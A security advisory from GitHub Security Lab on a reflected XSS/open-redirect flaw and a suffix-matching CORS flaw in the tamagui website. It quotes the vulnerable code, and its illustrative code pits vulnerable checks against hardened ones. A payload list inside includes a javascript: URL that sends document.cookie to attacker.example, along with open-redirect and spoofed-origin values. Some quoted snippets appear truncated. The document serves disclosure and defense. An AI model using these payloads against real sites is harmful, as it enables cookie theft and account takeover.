February 8, 2024

GHSL-2023-258_GHSL-2023-259: Reflected XSS vulnerability and CORS issue in tamagui

Kevin Stubbings

Coordinated Disclosure Timeline


A reflected XSS vulnerability and a CORS issue are present on the tamagui website. Either vulnerability may allow an attacker to leak the cookies of logged-in users and thus impersonate them on the website.



Tested Version



Issue 1: reflected XSS in /login (GHSL-2023-258)

A reflected XSS vulnerability exists in useForwardToDashboard.tsx. If a user clicks a specially crafted tamagui link supplied by an attacker, they are prompted to sign in (by pressing the GitHub login button). Once the login completes, the attacker-controlled redirect_to value is handed to the router, allowing the attacker to steal the user's cookie and impersonate the user.

 useEffect(() => {
    const main = async () => {
      if (user && !isLoading) {
        if ( {
          location.href =
            process.env.NODE_ENV === 'development'
              ? 'http://localhost:1421'
              : ''
        } else {
          await router.replace(
            typeof router.query.redirect_to === 'string'
              ? router.query.redirect_to      // < ----- redirect_to parameter is potentially attacker controlled
              : '/account'

In addition to being an XSS vulnerability (a javascript: URL in redirect_to is not a local route, so the router navigates to it and the script runs in the site's origin), this is also an open redirect vulnerability, because an attacker can send a freshly logged-in user to any domain of their choosing.
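The following is an added example, not tamagui's code: it puts the pass-through pattern from the snippet above next to a hardened check that only accepts same-origin paths for redirect_to. APP_ORIGIN, the payload list and the function names are assumptions made for the example.

```javascript
// Added example (not tamagui's code): validating a redirect_to query parameter
// before passing it to router.replace() or assigning location.href.
// APP_ORIGIN is an assumed origin; the real site's origin would take its place.

const APP_ORIGIN = 'https://app.example';
const DEFAULT_TARGET = '/account';

// The pattern from the vulnerable snippet: whatever string arrives in the
// query parameter is handed straight to the router.
function vulnerableTarget(redirectTo) {
  return typeof redirectTo === 'string' ? redirectTo : DEFAULT_TARGET;
}

// Hardened version: resolve the value against the app's own origin and only
// accept it if it still points at that origin. javascript: and data: URLs
// (opaque origin "null"), absolute URLs to other hosts, protocol-relative
// "//host" values and backslash variants ("/\host", which browsers parse as
// "//host") all end up on a different origin and fall back to the default.
function safeTarget(redirectTo, fallback = DEFAULT_TARGET) {
  if (typeof redirectTo !== 'string' || redirectTo.length === 0) return fallback;
  let parsed;
  try {
    parsed = new URL(redirectTo, APP_ORIGIN);
  } catch {
    return fallback;
  }
  if (parsed.origin !== APP_ORIGIN) return fallback;
  // Return only path, query and fragment, never a full URL, so the value
  // cannot later be reinterpreted as an absolute navigation target.
  return parsed.pathname + parsed.search + parsed.hash;
}

// Constructed payloads of the kind an attacker would place in a crafted link.
const PAYLOADS = [
  '/dashboard?tab=billing',                                             // legitimate same-origin path
  'javascript:fetch("https://attacker.example/?c="+document.cookie)',  // XSS via the router
  'https://attacker.example/phish',                                     // open redirect
  '//attacker.example/phish',                                           // protocol-relative open redirect
  '/\\attacker.example/phish',                                          // backslash treated as slash
];

// Runs every payload through both versions so the difference is visible.
function compare() {
  return PAYLOADS.map((p) => ({
    payload: p,
    vulnerable: vulnerableTarget(p),
    hardened: safeTarget(p),
  }));
}

console.table(compare());
```

Only the first payload survives safeTarget; every other one falls back to /account, while vulnerableTarget returns all five unchanged. Keeping the check on the server side of the login flow (rather than only in the client) is worth considering as well, since the client-side code is what the attacker's link drives.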

This vulnerability was found with the help of CodeQL’s XSS Query.


This issue may lead to Information Disclosure and Privilege Escalation.

Issue 2: CORS Issue in protectApiRoute (GHSL-2023-259)

A logic issue is present in the setupCors function, which is used to protect sensitive APIs. The middleware only checks whether the Origin header ends with one of the allowlisted domain strings, so an attacker-controlled origin whose hostname merely ends with that string (a registered domain of the form evil<allowed-domain>, for example) passes the check and is reflected back in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true.

export function setupCors(req: NextApiRequest, res: NextApiResponse) {
  const origin = req.headers.origin

  if (
    typeof origin === 'string' &&
    (origin.endsWith('') ||
      origin.endsWith('localhost:1421') ||
  ) {
    res.setHeader('Access-Control-Allow-Origin', origin)
    res.setHeader('Access-Control-Allow-Credentials', 'true')

If an attacker can get a logged-in user to visit a malicious website served from such an origin, the attacker's page can make credentialed cross-origin requests to the protected API routes: the browser attaches the user's cookies and, because the response allows credentials for that origin, lets the attacker's script read the response. The attacker could thereby steal the user's credentials and log in as them.
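The following is an added example, not tamagui's code: it reproduces the suffix-only origin check beside an exact-match version and shows which constructed Origin headers each accepts. The allowlisted origins, the hostnames and the function names are assumptions made for the example.

```javascript
// Added example (not tamagui's code): a suffix-only CORS origin check beside
// an exact-match version. The allowlisted origins are assumed for the example.

const ALLOWED_SUFFIXES = ['app.example', 'localhost:1421'];
const ALLOWED_ORIGINS = new Set(['https://app.example', 'http://localhost:1421']);

// Mirrors the vulnerable logic: any Origin header that merely ends with an
// allowlisted string is accepted and reflected.
function vulnerableOriginAllowed(origin) {
  return typeof origin === 'string' && ALLOWED_SUFFIXES.some((s) => origin.endsWith(s));
}

// Hardened: parse the Origin header as a URL and compare its serialized origin
// (scheme + host + port) against an exact allowlist. A browser's Origin header
// is exactly that serialization, so anything else is rejected.
function hardenedOriginAllowed(origin) {
  if (typeof origin !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return false; // not a URL at all, e.g. the literal string "null"
  }
  return ALLOWED_ORIGINS.has(parsed.origin);
}

// The headers a CORS middleware would set for a credentialed API route, given
// an origin-check function. Returns an empty object when the origin is
// rejected, so nothing is reflected and the browser blocks the read.
function corsHeaders(origin, allowed) {
  if (!allowed(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Constructed Origin headers: the legitimate ones plus attacker-registered
// hosts whose names happen to end with an allowlisted suffix.
const ORIGINS = [
  'https://app.example',                 // legitimate
  'http://localhost:1421',               // legitimate dev origin
  'https://evilapp.example',             // ends with "app.example"
  'https://not-app.example',             // also ends with "app.example"
  'https://app.example.attacker.example',// prefix trick, rejected by both
  'null',                                // opaque origin (sandboxed iframe, file://)
];

// Runs every origin through both checks so the bypass is visible.
function compare() {
  return ORIGINS.map((o) => ({
    origin: o,
    vulnerable: vulnerableOriginAllowed(o),
    hardened: hardenedOriginAllowed(o),
  }));
}

console.table(compare());
```

With the suffix check, https://evilapp.example and https://not-app.example are both accepted and reflected with credentials allowed, which is exactly what lets a page on those origins read the API responses of a logged-in visitor. The exact-match check accepts only the two listed origins. The added Vary: Origin header keeps a cache from serving one origin's reflected header to another.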

This vulnerability was found with the help of CodeQL’s CORS query.


This issue may lead to Information Disclosure



These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).


You can contact the GHSL team at, please include a reference to GHSL-2023-258 or GHSL-2023-259 in any communication regarding these issues.